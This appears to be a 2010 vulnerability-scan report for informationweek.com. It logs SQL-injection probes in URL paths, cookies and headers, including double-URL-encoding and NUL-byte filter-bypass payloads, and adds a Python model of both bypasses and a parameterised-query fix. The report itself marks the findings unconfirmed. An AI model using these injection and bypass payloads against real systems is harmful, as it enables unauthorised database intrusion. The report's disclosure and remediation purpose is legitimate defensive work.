Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30326
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video%2527%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video%2527%2527/security/68553969001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/68553969001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/68553969001'' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/68553969001''&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/81784308001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/81784308001'' HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001''&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that in the evidence below the single-quote request (once its redirect was followed) returned 200 OK with the normal page, and the double-quote request returned a 302 to the CAS login gateway; neither is a database error message. The same 200-then-302 pattern recurs for every cookie and header flagged in this report, so the heuristic may be reacting to the login-gateway redirect rather than to SQL errors. Treat the finding as unconfirmed until it is reproduced manually.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The web server's single URL-decode turns %2527 into %27, which passes a filter that looks for a literal quote; the application's own second decode then turns %27 into ' after the check has already run.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68383
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%2527%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The responses below show 200 OK for the NUL-byte-plus-quote payload and a 302 to the login gateway for the two-quote variant; no database error is visible in either, so this needs manual confirmation.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked. After the web server decodes %00 to a NUL byte, a filter that treats NUL as the end of the string stops inspecting there and never sees the quote that follows, while the application, which tracks the full length of the value, still receives it.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the WAF inspects the value only up to the NUL, but the application (here a Java platform, which keeps the full length of the string) processes everything after it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. A filter in front of the application is a compensating control, not a substitute for parameterised queries.
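The following is an added example, not code from the scan report or from the scanned application, that models both of the filter bypasses described above (the double URL-encoding bypass in the s_lv finding and the NUL-byte bypass in this s_sq finding) and then shows the remediation: canonicalise once, validate the canonical value, and bind it as a query parameter. The visits table, the lookup functions and the quote-blocklist filter are hypothetical; the cookie values are the ones that appear in the report's requests, and the in-memory SQLite database stands in for whatever database the real application uses.

```python
# Added example (hypothetical application code, not from the report). Models a
# quote blocklist applied to a cookie value, the two bypasses the report
# describes, and the hardened version of the same lookup.
import ctypes
import sqlite3
from urllib.parse import unquote


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one row keyed by the s_lv cookie value from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, s_lv TEXT NOT NULL)")
    conn.execute("INSERT INTO visits (s_lv) VALUES ('1292111917529')")
    conn.commit()
    return conn


def web_server_decode(raw_cookie: str) -> str:
    """The single URL-decode the web server performs before the application
    sees the value: %2527 becomes %27, %00 becomes a NUL byte, %27 becomes '."""
    return unquote(raw_cookie)


def native_waf_allows(server_decoded: str) -> bool:
    """Models a WAF written in native code. The value is inspected as a
    NUL-terminated C string, so inspection stops at the first NUL byte and a
    quote placed after it is never seen. ctypes.c_char_p.value gives exactly
    that C-string view of the buffer."""
    as_c_string = ctypes.c_char_p(server_decoded.encode("utf-8")).value
    return b"'" not in as_c_string


def vulnerable_lookup(conn: sqlite3.Connection, server_decoded: str) -> list:
    """The pattern the remediation detail warns about: the quote blocklist runs
    first, then the application URL-decodes a second time, then the result is
    concatenated into the SQL string. (Do not pass values containing NUL here;
    sqlite3 refuses SQL text with embedded NULs, which would hide the point.)"""
    if "'" in server_decoded:
        raise PermissionError("blocked by input filter")
    value = unquote(server_decoded)  # second decode: %27 -> ' after the check ran
    sql = f"SELECT id FROM visits WHERE s_lv = '{value}'"
    return [row[0] for row in conn.execute(sql)]


def probe(conn: sqlite3.Connection, server_decoded: str) -> str:
    """Reproduces the scanner's heuristic: one quote should break the query,
    two quotes (an escaped quote inside the string literal) should not."""
    try:
        vulnerable_lookup(conn, server_decoded)
        return "ok"
    except sqlite3.OperationalError:
        return "sql error"
    except PermissionError:
        return "blocked"


def hardened_lookup(conn: sqlite3.Connection, server_decoded: str) -> list:
    """Fix: if the application really must canonicalise (here, the second
    decode), do it first; validate the canonical value against an allowlist;
    bind it as a parameter so it can never change the query structure."""
    value = unquote(server_decoded)
    if not value.isdigit():  # s_lv is a numeric timestamp; anything else is rejected
        raise ValueError("s_lv must be numeric")
    rows = conn.execute("SELECT id FROM visits WHERE s_lv = ?", (value,))
    return [row[0] for row in rows]


def hardened_probe(conn: sqlite3.Connection, server_decoded: str) -> str:
    """Same differential as probe(), run against the hardened lookup."""
    try:
        hardened_lookup(conn, server_decoded)
        return "ok"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    for raw in ("1292111917529", "1292111917529%2527", "1292111917529%2527%2527"):
        decoded = web_server_decode(raw)
        print(f"{raw:26} vulnerable={probe(db, decoded):9} hardened={hardened_probe(db, decoded)}")
    nul_payload = web_server_decode("%5B%5BB%5D%5D%00'")
    print("native WAF allows NUL-byte payload:", native_waf_allows(nul_payload),
          "| application still sees a quote:", "'" in nul_payload)
```

Running the script shows the scanner's differential exactly as the report describes it against the vulnerable lookup (one decoded quote produces a SQL syntax error, two produce a well-formed query), the native-style filter passing the NUL-byte payload even though the application sees the quote, and the hardened lookup rejecting every malformed value before any query runs. The parameter binding is what removes the injection; the allowlist check only gives earlier, clearer failures.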
Request 1
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68289
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the cookie findings, the single-quote variant below returned 200 OK with the normal page and the two-quote variant a 302 to the login gateway, not an error message; confirm manually before relying on this.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The web server decodes %2527 to %27, which contains no literal quote when the filter runs; the application's second decode then yields the quote.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:23:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. This repeats the earlier s_sq finding against the /whitepaper/ path, with the same evidence pattern: 200 OK for the NUL-byte payload, 302 to the login gateway for the two-quote variant, and no database error in either response.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked, so that a filter treating the NUL as end of string never inspects the quote that follows it.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the WAF inspects the value only up to the NUL, but the application (here a Java platform, which keeps the full length of the string) processes everything after it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The evidence below shows 200 OK for the single quote and a 302 to the login gateway for two quotes rather than any error message; a Referer value reaching a query would be unusual, so confirm this manually before reporting it.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
